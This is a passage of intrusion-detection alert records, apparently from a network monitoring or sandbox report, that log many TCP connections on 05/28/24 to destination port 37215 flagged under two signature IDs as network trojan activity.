            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378733
            SID:2829579
            Source Port:32862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644349
            SID:2829579
            Source Port:55212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778630
            SID:2829579
            Source Port:34258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808285
            SID:2829579
            Source Port:52764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060100
            SID:2829579
            Source Port:37514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778373
            SID:2829579
            Source Port:44024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861029
            SID:2835222
            Source Port:57408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065615
            SID:2835222
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870234
            SID:2829579
            Source Port:48410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891527
            SID:2835222
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934274
            SID:2835222
            Source Port:41472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910794
            SID:2829579
            Source Port:53420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854267
            SID:2835222
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767050
            SID:2829579
            Source Port:58466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604260
            SID:2835222
            Source Port:38220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944968
            SID:2835222
            Source Port:37268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541254
            SID:2829579
            Source Port:49814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347267
            SID:2829579
            Source Port:50860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.640196
            SID:2835222
            Source Port:39042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573529
            SID:2829579
            Source Port:59448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048682
            SID:2835222
            Source Port:53570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774136
            SID:2829579
            Source Port:48498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859607
            SID:2829579
            Source Port:46776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071348
            SID:2829579
            Source Port:56764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026053
            SID:2835222
            Source Port:57112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539857
            SID:2829579
            Source Port:40900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.938908
            SID:2835222
            Source Port:47242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534039
            SID:2829579
            Source Port:39198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780069
            SID:2829579
            Source Port:47002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342009
            SID:2835222
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917034
            SID:2829579
            Source Port:41774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901354
            SID:2835222
            Source Port:57572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777878
            SID:2835222
            Source Port:41498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280347
            SID:2835222
            Source Port:53820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187212
            SID:2829579
            Source Port:47824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649784
            SID:2829579
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339936
            SID:2829579
            Source Port:39844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.972285
            SID:2835222
            Source Port:33032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956501
            SID:2829579
            Source Port:33748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604287
            SID:2835222
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709466
            SID:2829579
            Source Port:44902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.727279
            SID:2835222
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810288
            SID:2829579
            Source Port:56330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467250
            SID:2835222
            Source Port:46534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508155
            SID:2835222
            Source Port:35280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654623
            SID:2835222
            Source Port:50654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.939514
            SID:2835222
            Source Port:46090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020680
            SID:2829579
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051985
            SID:2829579
            Source Port:58392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.190914
            SID:2835222
            Source Port:44444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804600
            SID:2835222
            Source Port:38164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597238
            SID:2835222
            Source Port:53060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558911
            SID:2829579
            Source Port:51140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865001
            SID:2829579
            Source Port:55076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931130
            SID:2835222
            Source Port:54274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559416
            SID:2829579
            Source Port:59372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556239
            SID:2835222
            Source Port:47854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969307
            SID:2829579
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048066
            SID:2835222
            Source Port:50328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.767432
            SID:2835222
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004975
            SID:2835222
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931506
            SID:2829579
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280480
            SID:2829579
            Source Port:47308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309634
            SID:2829579
            Source Port:58392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004903
            SID:2835222
            Source Port:46130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039389
            SID:2835222
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543186
            SID:2835222
            Source Port:55506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.571058
            SID:2835222
            Source Port:53560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809584
            SID:2835222
            Source Port:36132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994145
            SID:2829579
            Source Port:59824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963238
            SID:2835222
            Source Port:39036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821776
            SID:2835222
            Source Port:51404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.964428
            SID:2835222
            Source Port:50824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374148
            SID:2829579
            Source Port:42632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953757
            SID:2835222
            Source Port:56056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824793
            SID:2829579
            Source Port:42876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720187
            SID:2835222
            Source Port:42134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936800
            SID:2835222
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922718
            SID:2829579
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825422
            SID:2835222
            Source Port:50010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540236
            SID:2829579
            Source Port:52636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641144
            SID:2835222
            Source Port:36710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534063
            SID:2835222
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746008
            SID:2835222
            Source Port:38636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618049
            SID:2829579
            Source Port:35242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092156
            SID:2829579
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969195
            SID:2829579
            Source Port:56812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010611
            SID:2835222
            Source Port:44152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895558
            SID:2835222
            Source Port:59630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934962
            SID:2829579
            Source Port:35708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294662
            SID:2829579
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860441
            SID:2829579
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470814
            SID:2829579
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862673
            SID:2835222
            Source Port:38300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.001438
            SID:2829579
            Source Port:35770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086680
            SID:2829579
            Source Port:55080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748405
            SID:2829579
            Source Port:49516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825207
            SID:2835222
            Source Port:47066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434336
            SID:2835222
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858644
            SID:2829579
            Source Port:38524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757818
            SID:2835222
            Source Port:44090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715582
            SID:2829579
            Source Port:42766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332408
            SID:2835222
            Source Port:48130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774489
            SID:2829579
            Source Port:42094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928789
            SID:2829579
            Source Port:46740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486759
            SID:2829579
            Source Port:39090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743289
            SID:2829579
            Source Port:43858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782803
            SID:2835222
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760962
            SID:2829579
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880117
            SID:2835222
            Source Port:34088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.767836
            SID:2829579
            Source Port:53066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811189
            SID:2829579
            Source Port:46380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222018
            SID:2829579
            Source Port:42104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291042
            SID:2829579
            Source Port:52704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026565
            SID:2835222
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443117
            SID:2835222
            Source Port:37076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290337
            SID:2835222
            Source Port:35094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811892
            SID:2835222
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744606
            SID:2835222
            Source Port:40516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895679
            SID:2829579
            Source Port:47082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961140
            SID:2829579
            Source Port:46506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010535
            SID:2829579
            Source Port:60952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467311
            SID:2835222
            Source Port:59302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865882
            SID:2829579
            Source Port:50536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824425
            SID:2835222
            Source Port:44494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756631
            SID:2835222
            Source Port:50288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810978
            SID:2829579
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649140
            SID:2829579
            Source Port:44034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852071
            SID:2835222
            Source Port:45068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900748
            SID:2835222
            Source Port:41002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334147
            SID:2829579
            Source Port:38986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746815
            SID:2829579
            Source Port:36264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553269
            SID:2829579
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.939753
            SID:2835222
            Source Port:34348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790107
            SID:2829579
            Source Port:47880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757879
            SID:2829579
            Source Port:40274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875070
            SID:2829579
            Source Port:37036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803777
            SID:2835222
            Source Port:38898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914021
            SID:2835222
            Source Port:40850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544312
            SID:2829579
            Source Port:55488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557222
            SID:2835222
            Source Port:51100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866893
            SID:2835222
            Source Port:43334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810372
            SID:2829579
            Source Port:33004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298410
            SID:2829579
            Source Port:36320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335418
            SID:2835222
            Source Port:44360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957150
            SID:2835222
            Source Port:34620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153019
            SID:2835222
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392728
            SID:2829579
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811698
            SID:2829579
            Source Port:59254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.815725
            SID:2835222
            Source Port:46348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914004
            SID:2829579
            Source Port:32868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918864
            SID:2829579
            Source Port:46296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067339
            SID:2829579
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851200
            SID:2829579
            Source Port:34054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051403
            SID:2835222
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925502
            SID:2835222
            Source Port:51236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075109
            SID:2835222
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676182
            SID:2835222
            Source Port:58296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447099
            SID:2835222
            Source Port:42998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057063
            SID:2835222
            Source Port:41022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905167
            SID:2835222
            Source Port:33238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945327
            SID:2829579
            Source Port:54458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817637
            SID:2829579
            Source Port:40442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.544002
            SID:2835222
            Source Port:37312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777715
            SID:2835222
            Source Port:57992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296389
            SID:2829579
            Source Port:40790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716897
            SID:2829579
            Source Port:47384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537149
            SID:2835222
            Source Port:34314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639011
            SID:2829579
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910149
            SID:2829579
            Source Port:39122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737905
            SID:2835222
            Source Port:38162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045759
            SID:2835222
            Source Port:38656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807211
            SID:2835222
            Source Port:39166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779479
            SID:2835222
            Source Port:45668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851185
            SID:2829579
            Source Port:43408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715306
            SID:2835222
            Source Port:46826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707456
            SID:2829579
            Source Port:51946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372623
            SID:2829579
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984701
            SID:2835222
            Source Port:46174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444953
            SID:2829579
            Source Port:57190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280213
            SID:2835222
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767030
            SID:2835222
            Source Port:35400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068271
            SID:2829579
            Source Port:49252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031520
            SID:2829579
            Source Port:48286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050751
            SID:2835222
            Source Port:60978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864349
            SID:2835222
            Source Port:54630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742982
            SID:2829579
            Source Port:56118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379921
            SID:2835222
            Source Port:42516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046138
            SID:2829579
            Source Port:50924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102777
            SID:2829579
            Source Port:57594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138307
            SID:2835222
            Source Port:57716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943103
            SID:2835222
            Source Port:58000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870349
            SID:2835222
            Source Port:40396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026265
            SID:2835222
            Source Port:42136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.035306
            SID:2829579
            Source Port:41358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532897
            SID:2835222
            Source Port:57462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923596
            SID:2829579
            Source Port:38462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
